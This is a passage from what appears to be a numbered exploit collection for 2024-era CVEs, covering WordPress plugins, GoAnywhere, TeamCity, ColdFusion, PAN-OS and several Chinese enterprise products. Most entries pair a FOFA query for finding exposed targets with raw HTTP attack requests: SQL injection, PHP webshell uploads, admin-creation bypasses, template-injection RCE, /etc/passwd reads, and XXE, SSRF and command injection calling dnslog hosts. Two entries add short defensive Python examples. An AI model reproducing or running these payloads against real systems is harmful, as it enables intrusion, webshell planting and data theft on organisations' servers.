COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo (北京百绰) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. Beijing Baichuo (北京百绰) Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo (北京百绰) Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328

File path: /upload/2.php

121. Beijing Baichuo (北京百绰) Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--

Uploaded file path: boot/web/upload/weblogo/1.php

122. Beijing Baichuo (北京百绰) Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
The sql parameter (sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=) is the SQL statement base64-encoded (an encoding, not encryption); decoded it reads: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

The command output is returned in the X-Cmd-Response response header.

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

Uploaded file URL: http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log straight into the admin backend, from which system commands can be executed.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
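The request above only works because the server joins the `../` segments onto its static root and serves whatever the result points at. The resolver below is an added example, not aiohttp's or ComfyUI's code, of the containment check a static-file handler needs: decode once, join onto the root, normalise, then verify the result is still under the root. The mount prefix `/static` and the root `/srv/app/static` are assumed for the example. Note that browsers and most HTTP clients collapse `..` before sending, so a probe like the one above has to be sent raw (for example with `curl --path-as-is`), which is also why such requests stand out in access logs.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Assumed for this example: the URL prefix the static route is mounted on and
# the directory it is meant to serve from.
STATIC_PREFIX = "/static"
STATIC_ROOT = "/srv/app/static"


def resolve_static(url_path: str,
                   prefix: str = STATIC_PREFIX,
                   root: str = STATIC_ROOT) -> Optional[str]:
    """Map a request path to a file under `root`, or return None.

    None means "do not serve": the path is outside the mount prefix, carries a
    NUL byte, or, once decoded and normalised, escapes the root directory.
    """
    if url_path != prefix and not url_path.startswith(prefix + "/"):
        return None                        # not this route
    rel = unquote(url_path[len(prefix):])  # "%2e%2e/" must be seen as "../"
    if "\x00" in rel:
        return None                        # NUL truncates paths in C-level APIs
    # Join first, normalise second. Normalising "/../../etc/passwd" on its own
    # would silently drop the leading ".." and hide the escape attempt.
    candidate = posixpath.normpath(posixpath.join(root, rel.lstrip("/")))
    root_norm = posixpath.normpath(root)
    # Containment check: the resolved file must still sit under root.
    if posixpath.commonpath([root_norm, candidate]) != root_norm:
        return None
    return candidate
```

In a deployment, resolve both sides with `os.path.realpath` as well so a symlink inside the root cannot point outside it; that step is left out here so the example runs without the directory existing.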

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

This is a blind, out-of-band check: a DNS or HTTP callback to the dnslog host confirms the external entity was resolved.
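The Params part above is parsed as XML, and the external entity `t` is what makes the parser reach out to the dnslog host. The snippet below is an added example, not Glodon's code, of the two layers an endpoint that accepts client XML should have: refuse any document that declares a DOCTYPE or ENTITY at all, and parse what remains with external entity resolution switched off so a declaration that slips past the first check still cannot trigger a network request. The two sample documents are constructed from the request above.

```python
import io
import re
import xml.sax
from typing import List, Tuple
from xml.sax.handler import ContentHandler, feature_external_ges, feature_external_pes

# Layer 1: a document sent by a client has no business declaring a DTD.
# Refusing the declaration up front stops XXE, entity-expansion bombs and
# parameter-entity tricks before any parser logic runs.
_DTD_MARKER = re.compile(rb"<!\s*(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)


def contains_dtd(document: bytes) -> bool:
    return _DTD_MARKER.search(document) is not None


class _TextCollector(ContentHandler):
    """Collects character data so the caller gets something back on success."""

    def __init__(self) -> None:
        super().__init__()
        self.parts: List[str] = []

    def characters(self, content: str) -> None:
        self.parts.append(content)


def parse_untrusted_xml(document: bytes) -> Tuple[bool, str]:
    """Return (accepted, text_or_reason).

    Layer 2: even if a DTD got past the first check, the SAX parser is told
    never to fetch external general or parameter entities, so a SYSTEM entity
    cannot cause an outbound request.
    """
    if contains_dtd(document):
        return False, "rejected: DOCTYPE/ENTITY declarations are not accepted"
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)
    parser.setFeature(feature_external_pes, False)
    handler = _TextCollector()
    parser.setContentHandler(handler)
    try:
        parser.parse(io.BytesIO(document))
    except xml.sax.SAXParseException as exc:
        return False, "rejected: malformed XML (%s)" % exc.getMessage()
    return True, "".join(handler.parts)


# Constructed samples: the entity payload from the request above, and a
# benign document of the same shape.
XXE_SAMPLE = (b'<?xml version="1.0" encoding="UTF-8"?>\n'
              b'<!DOCTYPE test [\n'
              b'<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">\n'
              b']>\n'
              b'<test>&t;</test>')
BENIGN_SAMPLE = b'<?xml version="1.0" encoding="UTF-8"?><test>BIM</test>'
```

The first layer is the one that matters operationally: it is cheap, parser-independent, and gives a clear log line when a client sends a DTD, which legitimate integrations almost never do.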

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018 Update 17 and earlier, 2021 Update 7 and earlier, 2023 Update 1 and earlier
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read /etc/passwd, sending the uuid from step 1 in the uuid header
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <= 20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
Time-based blind: the response is delayed by 3 seconds when the database name is 11 characters long.

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "<username>", "password": "<password>", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199, path traversal to admin pages:
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

Public exploit script: CVE-2024-27198-RCE.py

133. H5 Cloud Mall (H5 云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat /api/cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kirisun (福建科立讯) communications command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
Time-based blind: a vulnerable target delays its response by about 5 seconds (entries 138 to 140 use the same technique against other endpoints).
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kirisun (福建科立讯) communications command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kirisun (福建科立讯) communications command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kirisun (福建科立讯) communications command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kirisun (福建科立讯) communications command and dispatch platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak default password
CVE-2024-2966
FOFA:body="/808gps/"
Default credentials: admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to execute, base64-encoded (aWQ= decodes to id).
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}<dnslog-address>`;
Accept-Encoding: gzip

